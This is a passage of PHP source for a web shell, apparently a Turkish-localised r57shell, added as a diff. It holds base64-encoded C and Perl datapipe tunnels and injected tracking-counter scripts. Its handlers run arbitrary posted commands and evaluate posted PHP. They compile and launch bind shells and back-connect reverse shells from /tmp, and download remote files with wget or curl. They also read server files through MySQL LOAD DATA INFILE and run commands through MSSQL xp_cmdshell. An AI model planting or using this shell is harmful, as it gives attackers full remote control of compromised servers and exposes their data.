+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("Guvenlik: <b><font color=green>Acik</font></b>"):("Guvenlik: <b><font color=red>Kapali</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>Acik</font></b>"):("<b><font color=red>Kapali</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>Acik</font></b>"; } else { echo "<font color=red>Kapali</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>Acik</font></b>";}else{echo "<font color=red>Kapali</font></b>";}
+echo "<br>".ws(2);
+echo "Basarisiz Fonfsiyonlar : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>YOK</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."Harddisk Kullanilmayan : <b>".view_size($free)."</b> Harddisk Toplam  : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=Blue><b>Isletim Sistemi'.ws(1).'<br>Server :'.ws(1).'<br>Kullanici:'.ws(1).'<br>dizin :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mysql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mssql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] HATA! MySQL Server ile Baglanti Kurulamiyor...";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
